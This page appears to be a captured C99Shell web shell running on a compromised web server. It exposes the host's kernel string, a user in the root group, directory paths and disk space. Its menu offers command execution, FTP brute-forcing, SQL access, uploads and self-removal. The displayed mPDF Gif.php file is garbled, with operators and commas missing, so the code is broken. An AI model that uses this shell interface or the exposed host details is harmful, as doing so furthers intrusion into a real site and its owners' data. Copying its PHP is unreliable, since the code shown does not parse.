!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/vendor/mpdf/mpdf/src/Gif/   drwxr-xr-x
Free 25.18 GB of 117.98 GB (21.34%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Gif.php (1.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Mpdf\Gif;

/**
 * GIF Util - (C) 2003 Yamasoft (S/C)
 *
 * All Rights Reserved
 *
 * This file can be freely copied, distributed, modified, updated by anyone under the only
 * condition to leave the original address (Yamasoft, http://www.yamasoft.com) and this header.
 *
 * @link http://www.yamasoft.com
 */
class Gif
{

    var 
$m_gfh;

    var 
$m_lpData;

    var 
$m_img;

    var 
$m_bLoaded;

    public function 
__construct()
    {
        
$this->m_gfh = new FileHeader();
        
$this->m_img = new Image();
        
$this->m_lpData '';
        
$this->m_bLoaded false;
    }

    function 
ClearData()
    {
        
$this->m_lpData '';
        unset(
$this->m_img->m_data);
        unset(
$this->m_img->m_lzw->Next);
        unset(
$this->m_img->m_lzw->Vals);
        unset(
$this->m_img->m_lzw->Stack);
        unset(
$this->m_img->m_lzw->Buf);
    }

    function 
loadFile(&$data$iIndex)
    {
        if (
$iIndex 0) {
            return 
false;
        }
        
$this->m_lpData $data;

        
// GET FILE HEADER
        
$len 0;
        if (!
$this->m_gfh->load($this->m_lpData$len)) {
            return 
false;
        }

        
$this->m_lpData substr($this->m_lpData$len);

        do {
            
$imgLen 0;
            if (!
$this->m_img->load($this->m_lpData$imgLen)) {
                return 
false;
            }
            
$this->m_lpData substr($this->m_lpData$imgLen);
        } while (
$iIndex-- > 0);

        
$this->m_bLoaded true;
        return 
true;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--